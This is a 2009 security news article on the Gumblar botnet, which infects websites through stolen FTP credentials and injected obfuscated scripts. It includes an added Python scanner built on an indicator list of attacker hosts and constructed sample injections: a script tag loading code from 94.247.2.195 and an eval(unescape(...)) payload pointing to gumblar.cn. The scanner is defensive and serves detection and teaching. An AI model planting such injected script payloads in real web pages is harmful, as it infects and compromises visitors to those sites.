Gumblar Backdoors The Internet
SecurityProNews Staff Writer
2009-05-21
If you were trying to think of a name for an ogre, Gumblar might be a good choice. In this case, though, we're talking about one nasty botnet of compromised websites that's gaining steam quickly and screwing with people's Google search results.
Gumblar's a real clever snotbot, too. Once its initial way in is cut off, it backdoors the site so it can keep coming back. Once again, we can thank a domain in China for the headache: the injected scripts now point to gumblar.cn.
Officially called JSRedir-R, Gumblar is a Trojan script that now accounts for over 40 percent of the malicious code found on infected websites. Its nearest rival accounts for just seven percent.
In a nutshell, the attack targets popular websites, Internet Explorer users, and Google searchers. Websites ranking well in Google are targeted and, if not properly protected (experts suspect the attackers are getting in with stolen log-in credentials), are seeded with code that infects visitors who open PDF or Flash Player content without having updated their Adobe products. Once a person's machine is infected, their Google searches are redirected to more malicious websites.
But wait, it gets worse. Experts think the goal is the usual one: monitoring traffic and collecting log-in information and passwords. But it's not necessarily looking for ordinary user credentials. It's looking for FTP credentials on victims' computers, so that if the victim runs a website, the attackers can get into it and inject more code. What makes Gumblar so wickedly tricky, though, is the way it backdoors websites after an initial clean-up.
Security researchers have been tracking Gumblar since March, and everything seemed rather copacetic, as far as malware goes. Infected sites were quickly delisted from Google's index until webmasters could clean up their code. And then, according to ScanSafe:
As Google began delisting the compromised websites, those site owners began cleaning up the mal-scripts pointing to 94.247.2.195. Likely as a defensive maneuver, in early May the attackers began replacing the mal-scripts pointing to 94.247.2.195 with dynamically generated and heavily obfuscated mal-scripts pointing to gumblar.cn. Blacklisting based on the original mal-script would thus be defeated, allowing the compromised sites to once again be listed by search engines.
In addition, Gumblar installs a backdoor connecting to 78.109.29.112, which is the address of a notorious botnet command and control center.
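The switch ScanSafe describes, from a script tag that names 94.247.2.195 outright to a dynamically generated, obfuscated script that names gumblar.cn only after it runs, is exactly what breaks a blacklist keyed on the original script text. The following Python scanner is an added example (not code from the article, ScanSafe or Sophos) that shows the naive literal check failing on the new variant and a check that decodes the script before matching succeeding. The three addresses are the ones the article names; the injected script bodies are constructed for the demo and are not real Gumblar samples; the regexes and the obfuscation heuristic are this example's own assumptions.

```python
"""Scan HTML/PHP pages for injected Gumblar-style script tags.

Added example. The indicators (94.247.2.195, gumblar.cn, 78.109.29.112) are
the ones named in the article; the script bodies below are constructed for
the demo and are not real Gumblar samples.
"""
import re
from urllib.parse import quote, unquote

KNOWN_IOCS = ("94.247.2.195", "gumblar.cn", "78.109.29.112")

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]*)\)", re.I)
UNESCAPE_RE = re.compile(r"""unescape\s*\(\s*(['"])(.*?)\1\s*\)""", re.I | re.S)
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "document.write(")


def decode_layer(js: str) -> str:
    """Resolve one layer of String.fromCharCode(...) and unescape('...')."""
    js = FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1))), js)
    js = UNESCAPE_RE.sub(lambda m: unquote(m.group(2)), js)
    return js


def decode_layers(js: str, max_depth: int = 5) -> str:
    """Peel encoding layers until a pass changes nothing (bounded, so a
    pathological script cannot keep the scanner busy forever)."""
    for _ in range(max_depth):
        decoded = decode_layer(js)
        if decoded == js:
            break
        js = decoded
    return js


def literal_blacklist_hit(html: str) -> bool:
    """The naive check that was defeated in early May: match the indicator
    strings verbatim anywhere in the page."""
    return any(ioc in html for ioc in KNOWN_IOCS)


def scan_html(html: str) -> list:
    """Return (reason, detail) tuples for every script tag that looks injected."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        attrs, body = m.group(1), m.group(2)
        src = SRC_RE.search(attrs)
        if src and any(ioc in src.group(1) for ioc in KNOWN_IOCS):
            findings.append(("ioc-in-src", src.group(1)))
            continue
        decoded = decode_layers(body)
        hits = [ioc for ioc in KNOWN_IOCS if ioc in decoded]
        markers = sum(body.count(k) for k in OBFUSCATION_MARKERS)
        if hits:
            findings.append(("ioc-after-decode", hits[0]))
        elif markers >= 2 and len(body) > 120:
            # No known indicator, but eval/unescape/fromCharCode stacked on a
            # long opaque blob is what the next variant will look like too.
            findings.append(("suspicious-obfuscation", f"{markers} markers"))
    return findings


# --- constructed samples (not real Gumblar code) ---------------------------
CLEAN_PAGE = '<html><body><script src="/js/site.js"></script></body></html>'

# March-style injection: a plain script tag pointing at the original host.
ORIGINAL_VARIANT = ('<html><body>'
                    '<script src="http://94.247.2.195/js/x.js"></script>'
                    '</body></html>')

# May-style replacement: same effect, but the host name is built at run time
# from character codes and the whole call is percent-encoded behind unescape().
_inner = ('document.write(\'<script src="http://\' + '
          'String.fromCharCode(103,117,109,98,108,97,114,46,99,110) + '
          '\'/"></script>\')')
OBFUSCATED_VARIANT = ('<html><body><script>eval(unescape("'
                      + quote(_inner, safe="") + '"))</script></body></html>')


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("original", ORIGINAL_VARIANT),
                       ("obfuscated", OBFUSCATED_VARIANT)):
        print(f"{name:10s} literal={literal_blacklist_hit(page)!s:5s} "
              f"scan={scan_html(page)}")
```

The point to take from running it: `literal_blacklist_hit` catches the March-style tag and misses the May-style one, while `scan_html` catches both because it decodes before matching, and its obfuscation heuristic still flags a script that decodes to an address not yet on the list. Decoding is bounded and done with string substitution rather than by evaluating the script, so the scanner can be run over a site's files without executing anything an attacker wrote.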
If you run an infected site, Sophos recommends the following:
· Take the site down to protect other Internet users.
· Replace the contents of the site with a known clean backup.
· Change all passwords on the site (including FTP credentials).
· Patch all the site's software.
· Reload the site.
About the Author:
SecurityProNews is a daily online and email publication focusing on internet security issues.